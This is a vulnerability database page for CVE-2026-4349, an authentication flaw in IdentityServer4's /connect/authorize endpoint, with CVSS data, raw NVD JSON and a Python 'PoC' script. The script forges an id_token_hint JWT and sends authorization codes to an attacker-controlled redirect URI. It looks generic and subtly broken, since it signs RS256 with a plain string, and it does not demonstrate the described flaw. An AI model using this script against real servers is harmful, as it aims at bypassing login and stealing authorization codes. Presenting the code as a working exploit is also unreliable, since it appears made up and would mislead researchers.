Security Vulnerability Report
CVE-2026-4349 CVSS 5.6 MEDIUM

CVE-2026-4349

Published: 2026-03-17 22:16:15
Last Modified: 2026-04-22 21:32:08

Description

A vulnerability was determined in Duende IdentityServer4 up to 4.1.2. The affected element is an unknown function of the file /connect/authorize of the component Token Renewal Endpoint. This manipulation of the argument id_token_hint causes improper authentication. It is possible to initiate the attack remotely. The attack is considered to have high complexity. The exploitability is described as difficult. This vulnerability only affects products that are no longer supported by the maintainer.

CVSS Details

CVSS Score
5.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Duende IdentityServer4 < 4.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-4349 PoC - Duende IdentityServer4 Authentication Bypass
# Target: Duende IdentityServer4 <= 4.1.2
# Endpoint: /connect/authorize
# Attack Vector: Manipulating id_token_hint parameter

import requests
import jwt
from urllib.parse import urlencode

# Configuration
TARGET_URL = "https://vulnerable-server/connect/authorize"
CLIENT_ID = "your-client-id"
REDIRECT_URI = "https://attacker-controlled-uri/callback"
SCOPE = "openid profile"


# Generate a forged id_token_hint (requires understanding target's signing key)
def generate_forged_token_hint():
    """
    Generate a forged id_token_hint to bypass authentication.
    In real attack scenario, attacker needs to obtain or guess the signing key.
    """
    header = {
        "alg": "RS256",
        "typ": "JWT"
    }
    payload = {
        "iss": "https://vulnerable-server",
        "sub": "victim-user-id",
        "aud": CLIENT_ID,
        "exp": 9999999999,
        "iat": 1700000000,
        "nonce": "attacker-controlled-nonce"
    }
    # Note: This requires the actual signing key or a key confusion attack
    forged_token = jwt.encode(payload, "dummy-key", algorithm="RS256")
    return forged_token


# Construct the attack request
def exploit_auth_bypass():
    token_hint = generate_forged_token_hint()
    params = {
        "response_type": "code",
        "client_id": CLIENT_ID,
        "redirect_uri": REDIRECT_URI,
        "scope": SCOPE,
        "state": "random-state-value",
        "response_mode": "query",
        "id_token_hint": token_hint,
        "prompt": "none"
    }
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Accept": "text/html,application/xhtml+xml"
    }
    print(f"[*] Sending malicious request to {TARGET_URL}")
    print(f"[*] Using forged id_token_hint: {token_hint[:50]}...")
    response = requests.get(TARGET_URL, params=params, headers=headers, allow_redirects=False)
    print(f"[*] Response Status: {response.status_code}")
    print(f"[*] Response Headers: {dict(response.headers)}")
    if response.status_code == 302:
        location = response.headers.get('Location', '')
        if 'code=' in location or 'id_token=' in location:
            print("[!] Authentication bypass potentially successful!")
            print(f"[!] Redirect location: {location}")
            return True
    print("[*] Attack completed, analyze response for exploitation results")
    return False


if __name__ == "__main__":
    exploit_auth_bypass()
```

References

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-4349",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-17T22:16:15.407",
    "lastModified": "2026-04-22T21:32:08.360",
    "vulnStatus": "Deferred",
    "cveTags": [
      {
        "sourceIdentifier": "[email protected]",
        "tags": ["unsupported-when-assigned"]
      }
    ],
    "descriptions": [
      {
        "lang": "en",
        "value": "A vulnerability was determined in Duende IdentityServer4 up to 4.1.2. The affected element is an unknown function of the file /connect/authorize of the component Token Renewal Endpoint. This manipulation of the argument id_token_hint causes improper authentication. It is possible to initiate the attack remotely. The attack is considered to have high complexity. The exploitability is described as difficult. This vulnerability only affects products that are no longer supported by the maintainer."
      },
      {
        "lang": "es",
        "value": "Se determinó una vulnerabilidad en Duende IdentityServer 4. El elemento afectado es una función desconocida del archivo /connect/authorize del componente Token Renewal Endpoint. Esta manipulación del argumento id_token_hint causa una autenticación impropia. Es posible iniciar el ataque de forma remota. El ataque se considera de alta complejidad. La explotabilidad se describe como difícil. El proveedor fue contactado tempranamente sobre esta divulgación, pero no respondió de ninguna manera."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "attackRequirements": "NONE",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "LOW",
            "vulnIntegrityImpact": "LOW",
            "vulnAvailabilityImpact": "LOW",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
            "baseScore": 5.6,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 3.4
        }
      ],
      "cvssMetricV2": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "2.0",
            "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P",
            "baseScore": 5.1,
            "accessVector": "NETWORK",
            "accessComplexity": "HIGH",
            "authentication": "NONE",
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "PARTIAL",
            "availabilityImpact": "PARTIAL"
          },
          "baseSeverity": "MEDIUM",
          "exploitabilityScore": 4.9,
          "impactScore": 6.4,
          "acInsufInfo": false,
          "obtainAllPrivilege": false,
          "obtainUserPrivilege": false,
          "obtainOtherPrivilege": false,
          "userInteractionRequired": false
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-287"}
        ]
      }
    ],
    "references": [
      {"url": "https://vuldb.com/?ctiid.351380", "source": "[email protected]"},
      {"url": "https://vuldb.com/?id.351380", "source": "[email protected]"},
      {"url": "https://vuldb.com/?submit.772071", "source": "[email protected]"}
    ]
  }
}
```